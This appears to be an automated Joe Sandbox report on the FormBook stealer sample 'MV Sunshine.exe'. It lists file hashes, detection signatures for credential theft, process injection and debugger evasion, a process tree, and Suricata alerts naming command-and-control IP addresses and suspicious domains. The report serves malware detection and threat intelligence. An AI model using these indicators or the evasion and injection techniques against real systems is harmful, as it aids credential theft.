Edit tour

Windows Analysis Report
MV Sunshine.exe

Overview

General Information

Sample name:	MV Sunshine.exe
Analysis ID:	1548171
MD5:	475b4ea012d5203638f77e129c548bbb
SHA1:	cef400f9a232fe1554a23477ea5fe8352e33b620
SHA256:	b267f630524c57624e9db7a98ec0b6961d81d1b458a7b48a01802a9172e12a27
Tags:	exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

MV Sunshine.exe (PID: 612 cmdline: "C:\Users\user\Desktop\MV Sunshine.exe" MD5: 475B4EA012D5203638F77E129C548BBB)

svchost.exe (PID: 6012 cmdline: "C:\Users\user\Desktop\MV Sunshine.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

oVmFMrJhUAa.exe (PID: 4824 cmdline: "C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

find.exe (PID: 2836 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

oVmFMrJhUAa.exe (PID: 2656 cmdline: "C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4948 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

RuntimeBroker.exe (PID: 6012 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.3966156240.0000000002D80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2298353300.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3966567732.0000000002890000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3966004188.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3968329130.00000000051A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2298777568.0000000003720000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3964294017.0000000002840000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2299487480.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MV Sunshine.exe", CommandLine: "C:\Users\user\Desktop\MV Sunshine.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV Sunshine.exe", ParentImage: C:\Users\user\Desktop\MV Sunshine.exe, ParentProcessId: 612, ParentProcessName: MV Sunshine.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV Sunshine.exe", ProcessId: 6012, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\MV Sunshine.exe", CommandLine: "C:\Users\user\Desktop\MV Sunshine.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV Sunshine.exe", ParentImage: C:\Users\user\Desktop\MV Sunshine.exe, ParentProcessId: 612, ParentProcessName: MV Sunshine.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV Sunshine.exe", ProcessId: 6012, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T04:17:03.204337+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.6	49751	TCP
2024-11-04T04:17:41.474393+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.6	49967	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T04:17:18.341690+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49838	206.119.185.225	80	TCP
2024-11-04T04:17:42.132990+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49976	66.29.146.14	80	TCP
2024-11-04T04:17:55.594814+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49991	66.29.146.173	80	TCP
2024-11-04T04:18:09.232358+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49997	209.74.64.58	80	TCP
2024-11-04T04:18:23.107913+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50002	85.159.66.93	80	TCP
2024-11-04T04:18:38.888708+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50006	20.2.208.137	80	TCP
2024-11-04T04:18:52.547136+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50010	13.248.169.48	80	TCP
2024-11-04T04:19:05.827344+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50014	45.33.30.197	80	TCP
2024-11-04T04:19:19.153431+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50018	3.33.130.190	80	TCP
2024-11-04T04:19:32.856410+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50022	172.67.206.245	80	TCP
2024-11-04T04:19:46.626466+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50027	104.21.59.91	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T04:17:34.497157+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49930	66.29.146.14	80	TCP
2024-11-04T04:17:37.036797+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49944	66.29.146.14	80	TCP
2024-11-04T04:17:39.585762+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49958	66.29.146.14	80	TCP
2024-11-04T04:17:47.966080+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49988	66.29.146.173	80	TCP
2024-11-04T04:17:50.514298+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49989	66.29.146.173	80	TCP
2024-11-04T04:17:53.051016+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49990	66.29.146.173	80	TCP
2024-11-04T04:18:01.607434+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49992	209.74.64.58	80	TCP
2024-11-04T04:18:04.154311+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49993	209.74.64.58	80	TCP
2024-11-04T04:18:06.701204+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49996	209.74.64.58	80	TCP
2024-11-04T04:18:15.919991+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49999	85.159.66.93	80	TCP
2024-11-04T04:18:18.544903+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50000	85.159.66.93	80	TCP
2024-11-04T04:18:21.091810+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50001	85.159.66.93	80	TCP
2024-11-04T04:18:31.279256+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50003	20.2.208.137	80	TCP
2024-11-04T04:18:33.810486+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50004	20.2.208.137	80	TCP
2024-11-04T04:18:36.486179+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50005	20.2.208.137	80	TCP
2024-11-04T04:18:44.793989+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50007	13.248.169.48	80	TCP
2024-11-04T04:18:47.371759+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50008	13.248.169.48	80	TCP
2024-11-04T04:18:49.961977+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50009	13.248.169.48	80	TCP
2024-11-04T04:18:58.186385+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50011	45.33.30.197	80	TCP
2024-11-04T04:19:00.732475+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50012	45.33.30.197	80	TCP
2024-11-04T04:19:03.291851+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50013	45.33.30.197	80	TCP
2024-11-04T04:19:11.577546+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50015	3.33.130.190	80	TCP
2024-11-04T04:19:14.935590+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50016	3.33.130.190	80	TCP
2024-11-04T04:19:17.501975+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50017	3.33.130.190	80	TCP
2024-11-04T04:19:25.283978+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50019	172.67.206.245	80	TCP
2024-11-04T04:19:27.801274+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50020	172.67.206.245	80	TCP
2024-11-04T04:19:30.358213+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50021	172.67.206.245	80	TCP
2024-11-04T04:19:38.977456+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50023	104.21.59.91	80	TCP
2024-11-04T04:19:41.501715+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50024	104.21.59.91	80	TCP
2024-11-04T04:19:44.074048+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50025	104.21.59.91	80	TCP
2024-11-04T04:19:53.138659+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50028	91.184.0.200	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: MV Sunshine.exe	ReversingLabs: Detection: 28%
Source: MV Sunshine.exe	Virustotal: Detection: 23%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3966156240.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298353300.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3966567732.0000000002890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3966004188.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3968329130.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298777568.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3964294017.0000000002840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299487480.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: MV Sunshine.exe

Joe Sandbox ML: detected

Source: MV Sunshine.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: find.pdb source: svchost.exe, 00000002.00000002.2298577074.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298556423.0000000003200000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965368113.0000000000C58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oVmFMrJhUAa.exe, 00000003.00000000.2219802940.00000000006FE000.00000002.00000001.01000000.00000004.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3964401798.00000000006FE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: MV Sunshine.exe, 00000000.00000003.2117928427.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine.exe, 00000000.00000003.2116316575.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2205655120.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204017242.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.000000000399E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.3966524421.000000000317E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2302636573.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2298597347.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.3966524421.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MV Sunshine.exe, 00000000.00000003.2117928427.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine.exe, 00000000.00000003.2116316575.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2205655120.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204017242.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.000000000399E000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.3966524421.000000000317E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2302636573.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2298597347.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.3966524421.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: find.pdbGCTL source: svchost.exe, 00000002.00000002.2298577074.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298556423.0000000003200000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965368113.0000000000C58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: find.exe, 00000004.00000002.3967280480.000000000360C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.3964890835.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000000.2367418538.0000000002D6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2586131537.0000000013B0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: find.exe, 00000004.00000002.3967280480.000000000360C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.3964890835.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000000.2367418538.0000000002D6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2586131537.0000000013B0C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00684696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00684696
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068C93C FindFirstFileW,FindClose,	0_2_0068C93C
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0068C9C7
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068F200
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068F35D
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068F65E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00683A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00683A2B
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00683D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00683D4E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068BF27
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0285C620 FindFirstFileW,FindNextFileW,FindClose,	4_2_0285C620

Source: C:\Windows\SysWOW64\find.exe	Code function: 4x nop then xor eax, eax		4_2_02849D40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_02E704DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49838 -> 206.119.185.225:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49930 -> 66.29.146.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49944 -> 66.29.146.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 66.29.146.14:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49976 -> 66.29.146.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49997 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50002 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 172.67.206.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 45.33.30.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50018 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50027 -> 104.21.59.91:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 172.67.206.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 45.33.30.197:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50006 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 172.67.206.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 104.21.59.91:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 104.21.59.91:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50014 -> 45.33.30.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 172.67.206.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 45.33.30.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 104.21.59.91:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50010 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.rtpakuratkribo.xyz
Source:	DNS query: www.idaschem.xyz

Source: Joe Sandbox View	IP Address: 45.33.30.197 45.33.30.197
Source: Joe Sandbox View	IP Address: 45.33.30.197 45.33.30.197
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49751
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49967

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
